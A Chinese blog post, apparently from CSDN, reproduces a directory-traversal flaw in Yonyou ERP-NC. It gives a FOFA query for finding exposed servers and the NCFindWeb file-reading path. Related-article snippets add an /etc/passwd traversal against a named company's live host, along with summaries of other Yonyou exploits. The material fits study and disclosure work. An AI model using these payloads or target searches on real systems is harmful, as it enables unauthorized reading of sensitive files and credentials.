用友NC目录遍历漏洞复现

最新推荐文章于 2024-07-25 12:28:33 发布
最新推荐文章于 2024-07-25 12:28:33 发布
阅读量2.4k 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1593572468/article/details/121405863
版权

简介:

用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。

漏洞复现:

fofa直接搜索:

app="用友-UFIDA-NC"

漏洞拼接目录:

/NCFindWeb?service=IPreAlertConfigService&filename

/NCFindWeb?service=IPreAlertConfigService&filename=

读取:filename=读取的文件名

 

Cheng-Ling
关注
漏洞库】用友系统
weixin_46301214的博客
12-20 468
漏洞库持续更新中,最后更新日期:2023年12月20日用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞图片加载不出来,以后再写用友 U8 cloud upload.jsp 任意文件上传漏洞
漏洞复现用友NC-文件读取-printBill
最新发布
知黑而守白
09-10 89
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC download 接口存在任意文件读取漏洞。攻击者可以通过恶意构造的请求读取服务器上的任意文件,包括敏感的系统文件。此漏洞可能导致泄露敏感信息,为攻击者提供足够的信息来进一步渗透系统。
SRC-用友 ERP-NC NCFindWeb 目录遍历漏洞
hackzkaq的博客
11-06 965
NCFindWeb?service=IPreAlertConfigService&filename=文件名。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。
用友NC 漏洞
2301_80115097的博客
12-01 444
NCFindWeb?service=IPreAlertConfigService&filename=文件名。用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞,否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。使用pocsuite3批量验证。
漏洞挖掘姿势之-用友NC目录遍历
Grace_for_it的博客
05-19 391
渗透测试 漏洞验证 用友NC
用友OA漏洞学习——NCFindWeb 目录遍历漏洞
记录并分享学习安全的知识点..
07-03 1447
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1058
漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞,附带自己写的poc脚本
用友-UFIDA-NC_saveDoc接口存在文件上传漏洞
m0_46604997的博客
04-25 675
UFIDA NC是一款基于B/S架构的ERP软件是面向大型企业集团的集团管理解决方案,它支持多语言、多币种、多国家的应用,覆盖了财务会计、人力资源、供应链、生产制造、销售物流等企业核心业务领域,还提供了自动化工作流程、数据采集、移动应用、BI报表、分析等功能,帮助企业迅速建立业务管理、信息共享和某协办公的平台。用友-UFIDA-NC saveDoc.ajax 存在任意文件上传漏洞,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 1912
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
Goby 漏洞发布|用友-UFIDA-NC /portal/pt/oacoSchedulerEvents/isAgentLimit SQL 注入漏洞
m0_46699477的博客
06-12 448
用友NC是一套全面的企业资源规划软件解决方案,用于管理企业的各个方面,包括财务、人力资源、供应链、生产和销售等。用友NC /portal/pt/oacoSchedulerEvents/isAgentLimit 存在SQL注入漏洞,攻击者可通过该漏洞在服务器端写⼊后⻔,获取服务器权限,进⽽控制整个web服务器。
用友UFIDA-NC download 任意文件下载漏洞复现(含nuclei-poc)
m0_50797689的博客
03-21 411
用友UFIDA-NC download 任意文件下载漏洞复现(含nuclei-poc)
汇智ERP filehandle.aspx 任意文件读取漏洞复现
0xSec
07-25 580
汇智ERP filehandle.aspx 接口处任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。
Doliber ERP & CRM 的漏洞复现报告
weixin_62570809的博客
11-02 1363
Doliber ERP & CRM 的漏洞复现
用友漏洞php,用友ERP-NC某处通用文件包含漏洞 | CN-SEC 中文网
weixin_33238272的博客
03-29 2235
中粮集团http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd还可以读取默认配置文件http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/b...
漏洞复现用友 NC NCFindWeb 任意文件读取漏洞
alert['Hello World']
06-20 610
用友 NC-Cloud NCFindWeb 接口中存在任意文件读取漏洞。该漏洞允许未经授权的攻击者通过特定的请求读取服务器上的任意文件,而这些文件可能包含敏感信息,例如系统配置文件、数据库凭证、日志文件等其他文件,企业内部的机密数据、客户信息以及其他隐私数据都面临着泄露的风险。
用友ERP-NC系统 NCFindWeb接口文件读取
maverickpig的博客
03-10 2178
用友NC NCfindweb接口文件读取漏洞
漏洞复现用友NC——文件上传漏洞
weixin_54799594的博客
07-16 1388
漏洞复现过程记录
用友nc反序列化漏洞
12-21
用友NC反序列化漏洞是指用友NC软件存在的一种安全漏洞,攻击者可以利用该漏洞向受害者的系统中注入恶意代码,导致系统遭受攻击。该漏洞的成因主要是由于用友NC软件在反序列化过程中存在安全性缺陷,攻击者可以利用这一点来执行未经授权的代码。 攻击者通常会利用一些常见的反序列化漏洞利用技术,如反序列化注入、反序列化利用链等,来利用用友NC软件的漏洞进行攻击。通过构造恶意的序列化数据,攻击者可以在受害者系统中执行恶意代码,包括但不限于执行任意命令、获取系统权限、窃取敏感信息等行为。 为了防范用友NC反序列化漏洞的攻击,用户和系统管理员可以采取一些措施,如及时安装官方发布的安全补丁、加强系统安全配置、限制用户权限、使用安全的序列化与反序列化机制等。另外,对于已知的漏洞利用技术,用户还可以利用防火墙、入侵检测系统等安全设备进行监测和阻断。 总之,要防范用友NC反序列化漏洞的攻击,需要用户和系统管理员密切关注安全动态,及时采取必要的安全措施来保护系统和数据的安全。同时,用友NC软件的开发者也应及时修复这类漏洞,加强软件的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值